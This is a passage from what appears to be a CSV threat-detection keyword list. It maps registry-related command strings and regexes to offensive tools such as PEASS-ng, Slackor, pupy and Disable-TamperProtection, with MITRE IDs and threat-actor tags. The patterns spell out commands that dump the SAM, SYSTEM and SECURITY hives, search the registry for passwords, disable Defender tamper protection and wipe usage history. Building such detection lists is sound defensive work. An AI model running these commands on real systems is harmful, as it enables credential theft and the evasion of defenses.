T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56749" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56750" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56751" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56752" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps"" 
/f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Search\\RecentApps\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56755" "*REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe""*",".{0,1000}REG\sDELETE\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\"".{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#registry","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","56760" "*reg delete ""HKLM\SYSTEM\Remote Manipulator System"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\SYSTEM\\Remote\sManipulator\sSystem\""\s\/f.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A","56791" "*reg delete *HKEY_LOCAL_MACHINE\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* SD 
*",".{0,1000}reg\sdelete\s.{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\sSD\s.{0,1000}","offensive_tool_keyword","reg","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","N/A","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","56794" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\s\/va\s\/f.{0,1000}","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56796" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Security /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\sSecurity\s\/f.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","#registry","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","56797" "*reg query HKCU /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56803" "*reg query HKCU /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56805" "*reg query HKLM /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56813" "*reg query HKLM /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56816" "*reg save hklm\sam 1337*",".{0,1000}reg\ssave\shklm\\sam\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56837" "*reg save hklm\system 1337*",".{0,1000}reg\ssave\shklm\\system\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56842" "*REG.EXE ADD * /V ThreadingModel /T REG_SZ /D Apartment /F*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/V\sThreadingModel\s\/T\sREG_SZ\s\/D\sApartment\s\/F.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56848" "*REG.EXE ADD * /VE /T REG_SZ /D *\msg.dll*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/VE\s\/T\sREG_SZ\s\/D\s.{0,1000}\\msg\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56849" "*REG.EXE ADD * /VE /T REG_SZ /D *\msg_x64.dll*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/VE\s\/T\sREG_SZ\s\/D\s.{0,1000}\\msg_x64\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56850" "*reg.exe add \""HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"" /v 
TamperProtection /t REG_DWORD /d 4 /f*",".{0,1000}reg\.exe\sadd\s\\\""HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\sDefender\\\\Features\\\""\s\/v\sTamperProtection\s\/t\sREG_DWORD\s\/d\s4\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56852" "*reg.exe delete *HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Instances\\WdFilter Instance* /v Altitude /f*",".{0,1000}reg\.exe\sdelete\s.{0,1000}HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WdFilter\\\\Instances\\\\WdFilter\sInstance.{0,1000}\s\/v\sAltitude\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56855" "*reg.exe delete *HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance* /v Altitude /f*",".{0,1000}reg\.exe\sdelete\s.{0,1000}HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Instances\\WdFilter\sInstance.{0,1000}\s\/v\sAltitude\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56856" "*reg.exe export 
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion*",".{0,1000}reg\.exe\sexport\sHKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#registry","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56857" "*reg.exe query hklm\security\policy\secrets*",".{0,1000}reg\.exe\squery\shklm\\security\\policy\\secrets.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#registry","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56860" "*reg.exe save HKLM\*",".{0,1000}reg\.exe\ssave\sHKLM\\.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#registry","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56861" "*reg.exe save HKLM\SAM sam_*",".{0,1000}reg\.exe\ssave\sHKLM\\SAM\ssam_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56863" "*reg.exe save 
hklm\sam*",".{0,1000}reg\.exe\ssave\shklm\\sam.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56864" "*reg.exe save HKLM\SECURITY security_*",".{0,1000}reg\.exe\ssave\sHKLM\\SECURITY\ssecurity_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56866" "*reg.exe save hklm\security*",".{0,1000}reg\.exe\ssave\shklm\\security.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56867" "*reg.exe save HKLM\SYSTEM sys*",".{0,1000}reg\.exe\ssave\sHKLM\\SYSTEM\ssys.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56869" "*reg.exe save hklm\system*",".{0,1000}reg\.exe\ssave\shklm\\system.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 
is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56870" "*reg.py *@* save -keyName 'HKLM\SAM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SAM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56881" "*reg.py *@* save -keyName 'HKLM\SECURITY*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SECURITY.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56882" "*reg.py *@* save -keyName 'HKLM\SYSTEM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SYSTEM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56883" "*reGeorg-master*",".{0,1000}reGeorg\-master.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","56885" "*reGeorgSocksProxy.py*",".{0,1000}reGeorgSocksProxy\.py.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","56886" "*RegHiveBackup.exe*",".{0,1000}RegHiveBackup\.exe.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","1","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56887" "*Register-MaliciousWmiEvent*",".{0,1000}Register\-MaliciousWmiEvent.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","56893" "*register-python-argcomplete --no-defaults 
exegol*",".{0,1000}register\-python\-argcomplete\s\-\-no\-defaults\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56894" "*Register-SQLC2Agent*",".{0,1000}Register\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","56895" "*Registry KeeTheifLurker * Created*",".{0,1000}Registry\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","56896" "*registry_hijacking_eventvwr*",".{0,1000}registry_hijacking_eventvwr.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written 
in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56897" "*registry_hijacking_fodhelper*",".{0,1000}registry_hijacking_fodhelper.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56898" "*RegistryImplant*",".{0,1000}RegistryImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","56899" "*registry-read.py*",".{0,1000}registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56900" "*RegistryTinker.exe*",".{0,1000}RegistryTinker\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","56901" "*RegReeper.7z*",".{0,1000}RegReeper\.7z.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56902" "*RegReeper.cpp*",".{0,1000}RegReeper\.cpp.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense 